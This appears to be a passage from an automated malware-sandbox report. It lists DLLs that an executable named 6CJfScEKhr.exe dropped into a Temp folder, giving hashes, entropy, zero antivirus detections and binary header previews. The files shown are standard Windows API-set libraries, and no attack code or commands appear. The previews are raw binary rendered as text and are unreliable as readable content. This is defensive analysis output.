                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-handle-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.1117101479630005
                                                                    Encrypted:false
                                                                    SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                    MD5:6DB54065B33861967B491DD1C8FD8595
                                                                    SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                    SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                    SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-heap-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.174986589968396
                                                                    Encrypted:false
                                                                    SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                    MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                    SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                    SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                    SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-interlocked-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):17856
                                                                    Entropy (8bit):7.076803035880586
                                                                    Encrypted:false
                                                                    SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                    MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                    SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                    SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                    SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.131154779640255
                                                                    Encrypted:false
                                                                    SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                    MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                    SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                    SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                    SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-localization-l1-2-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):20792
                                                                    Entropy (8bit):7.089032314841867
                                                                    Encrypted:false
                                                                    SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                    MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                    SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                    SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                    SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-memory-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.101895292899441
                                                                    Encrypted:false
                                                                    SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                    MD5:D500D9E24F33933956DF0E26F087FD91
                                                                    SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                    SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                    SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.16337963516533
                                                                    Encrypted:false
                                                                    SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                    MD5:6F6796D1278670CCE6E2D85199623E27
                                                                    SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                    SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                    SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19248
                                                                    Entropy (8bit):7.073730829887072
                                                                    Encrypted:false
                                                                    SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                    MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                    SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                    SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                    SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processthreads-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19392
                                                                    Entropy (8bit):7.082421046253008
                                                                    Encrypted:false
                                                                    SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                    MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                    SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                    SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                    SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processthreads-l1-1-1.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.1156948849491055
                                                                    Encrypted:false
                                                                    SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                    MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                    SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                    SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                    SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-profile-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):17712
                                                                    Entropy (8bit):7.187691342157284
                                                                    Encrypted:false
                                                                    SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                    MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                    SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                    SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                    SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):17720
                                                                    Entropy (8bit):7.19694878324007
                                                                    Encrypted:false
                                                                    SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                    MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                    SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                    SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                    SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-string-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.137724132900032
                                                                    Encrypted:false
                                                                    SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                    MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                    SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                    SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                    SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-synch-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):20280
                                                                    Entropy (8bit):7.04640581473745
                                                                    Encrypted:false
                                                                    SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                    MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                    SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                    SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                    SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-synch-l1-2-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.138910839042951
                                                                    Encrypted:false
                                                                    SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                    MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                    SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                    SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                    SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19248
                                                                    Entropy (8bit):7.072555805949365
                                                                    Encrypted:false
                                                                    SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                    MD5:19A40AF040BD7ADD901AA967600259D9
                                                                    SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                    SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                    SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-timezone-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18224
                                                                    Entropy (8bit):7.17450177544266
                                                                    Encrypted:false
                                                                    SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                    MD5:BABF80608FD68A09656871EC8597296C
                                                                    SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                    SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                    SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-util-l1-1-0.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.1007227686954275
